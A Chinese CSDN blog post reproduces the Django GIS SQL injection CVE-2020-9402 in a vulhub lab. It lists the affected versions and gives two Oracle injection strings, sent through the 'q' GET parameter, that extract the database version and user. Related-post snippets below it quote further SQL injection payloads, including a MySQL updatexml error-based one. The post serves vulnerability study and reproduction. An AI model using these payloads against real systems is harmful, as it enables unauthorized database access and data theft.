Django GIS SQL注入漏洞(CVE-2020-9402)

最新推荐文章于 2024-05-17 11:06:19 发布
最新推荐文章于 2024-05-17 11:06:19 发布
阅读量326 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117281297
版权
本文介绍了Django Web框架在多个版本中存在SQL注入漏洞的详细情况,包括受影响的版本列表。攻击者可以利用这个漏洞进行数据查看、添加、修改或删除。示例展示了两种不同的漏洞复现方式,提醒开发者注意对输入参数的验证和过滤,以防止恶意SQL注入攻击。建议升级到不受影响的Django版本以确保系统安全。
摘要由CSDN通过智能技术生成

漏洞背景

Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。

影响版本

  • Djangoproject Django 1.11 - 1.11.29
  • Djangoproject Django 2.2 - 2.2.11
  • Djangoproject Django 3.0 - 3.0.4
  • Debian Debian_Linux 9.0
  • Debian Debian_Linux 10.0
  • Fedoraproject Fedora 32

漏洞复现

漏洞一:
首先访问http://your-ip:8000/vuln/
在该网页中使用get方法构造q的参数,构造SQL注入的字符串20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1
漏洞二:
访问http://your-ip:8000/vuln2/
在该网页中使用get方法构造q的参数,构造出SQL注入的字符串0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --

漏洞复现】Django SQL注入漏洞 (CVE-2022-28346)
做自己喜欢的事,并将其发挥到极致!
01-01 5005
Django是用Python开发的一个免费开源的Web结构,几乎包括了Web使用方方面面,能够用于快速建立高性能、文雅的网站,Diango提供了许多网站后台开发常常用到的模块,使开发者可以专注于业务部分。攻击者使用精心编制的字典,通过 **kwargs 传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击,该漏洞2.2.28之前的Django 2.2、3.2.13之前的3.2和4.0.4之前的4.0中都存在这个问题。
Django SQL注入漏洞CVE-2020-7471)复现
玄道的网安博客
08-01 2853
简介 Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句。 影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 环境搭建 ..
17 - vulhub - Django GIS SQL注入漏洞CVE-2020-9402
易编橙 · 终身成长社群,相遇已是上上签!
11-10 1803
文章目录漏洞名称:Django GIS SQL注入漏洞CVE-2020-9402)影响版本漏洞原理漏洞复现漏洞利用限制环境准备漏洞利用漏洞漏洞漏洞详细分析修复建议 漏洞名称:Django GIS SQL注入漏洞CVE-2020-9402) 简介: DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在S
Django SQL注入漏洞分析(CVE-2022-28346)
蚁景网安学院
05-11 1378
Django 在2022年发布的安全更新,修复了在 QuerySet 的 annotate(), aggregate(), extra() 等函数中存在的 SQL 注入漏洞
17 - vulhub - Django GIS SQL注入漏洞CVE-2024-9402
fdsgdsgdfw的博客
03-23 854
Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)2、用户在oracle的数据库且可控tolerance查询时的键名。
17 - vulhub - Django GIS SQL注入漏洞CVE-2024-9402
2401_83974064的博客
04-06 429
目、讲解视频,并且后续会持续更新**
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
Django_CVE-2020-9402_Geo_SQL注入分析 Django 框架是一个流行的 Python Web 框架,它提供了许多实用的功能,包括 GIS( Geographic Information System)查询功能。然而,在 Django 中的 GIS 查询中存在一个_sql ...
Django SQL注入漏洞CVE-2020-7471) 复现
weixin_47531489的博客
07-19 794
1 简介 Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于DjangoDjango 是一个开放源代码的 Web 应用框架,由 Python 写成。Django 遵守 BSD 版权,初次发布于 2005 年 7 月, 并于 2008 年 9 月发布了第一个正式版本 1.0 。Django 采用了 MVT 的软件设计模式,即模型(Model),视图(View)和模板(Template)。 2 漏洞概述 2020年2月3日,Django
Vulhub-django GIS SQL注入漏洞
shayebudon的博客
12-14 1087
首先转到列表视图:http://your-ip:8000/vuln/ 添加?order=-id到 GET 参数。看到按 id 降序排列的数据。 看到按 id 降序排列的数据。 因此根据这个信息我们可以构造报错注入来进行攻击获取数据信息。 ?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23,其中vuln是我们的应用程序和collection模型。 .
vulhub Django GIS SQL注入漏洞复现
weixin_53696027的博客
05-25 282
vulhub CVE-2020-9402漏洞复现
Oracle SQL 注入上的 Django GIS 函数和聚合漏洞CVE-2020-9402
weixin_56537388的博客
11-24 737
Django2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。
Django-CVE-2020-9402 复现
最新发布
weixin_60567444的博客
05-17 409
GIS 查询功能中存在的SQL注入漏洞,使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞
vulhub复现之djangoCVE-2019-14234、CVE-2020-9402
小城的博客
12-03 1292
vulhub复现之djangoCVE-2019-14234、CVE-2020-9402CVE-2018-14574、CVE-2017-12794)背景小故事django漏洞概述CVE-2019-14234漏洞复现漏洞修复CVE-2020-9402漏洞复现修复建议 背景小故事 公司的人一个个的都去云南参加等保测评考试,剩下我一个小扑街孤苦伶仃地在公司学习,惨的一批(我也想去云南地说) 没办法,自己搭了个vulhub玩玩,学习学习cve漏洞复现 django漏洞概述 Django通常搭配postgres
Django SQL注入漏洞CVE-2020-7471)
黑白的博客
12-13 842
声明 好好学习,天天向上 漏洞描述 2020年2月3日,Django官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 影响范围 • Django 1.11.x < 1.11.28 • Django 2.2.x < 2.2.10 • Django 3.0.x < 3.0.3 复现过程 这里使用3.0
CVE-2022-28346:Django SQL注入漏洞
yggcwhat
07-05 1656
CVE-2022-28346:Django SQL注入漏洞
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234
qq_51577576的博客
09-30 2597
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>